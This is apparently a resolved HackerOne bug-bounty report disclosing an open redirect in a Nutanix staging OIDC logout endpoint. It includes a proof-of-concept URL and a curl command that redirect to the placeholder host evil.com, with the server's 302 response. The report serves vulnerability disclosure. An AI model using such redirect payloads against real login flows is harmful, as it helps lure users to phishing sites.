OPEN REDIRECT
Low
N
Nutanix
Submitted None
Actions:
Reported by
kauenavarro
Vulnerability Details
Technical details and impact analysis
Open Redirect Vulnerability
Hello , found open redirect in https://stage.test.dev-iam.xi.nutanix.com/api/iam/authn/v1/oidc/logout?post_logout_redirect_uri=.
Go to
https://stage.test.dev-iam.xi.nutanix.com/api/iam/authn/v1/oidc/logout?post_logout_redirect_uri=http://evil.com&id_token_hint=test
curl -I "https://stage.test.dev-iam.xi.nutanix.com/api/iam/authn/v1/oidc/logout?post_logout_redirect_uri=http://evil.com&id_token_hint=test"
HTTP/2 302
content-type: text/html; charset=utf-8
location: http://evil.com
date: Wed, 13 Oct 2021 20:55:57 GMT
x-envoy-upstream-service-time: 2
server: envoy
##Reference
https://hackerone.com/reports/504751
https://portswigger.net/kb/issues/00500100_open-redirection-reflected
## Impact
An attacker can use this vulnerability to redirect users to other malicious websites, which can be used for phishing and similar attacks
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Open Redirect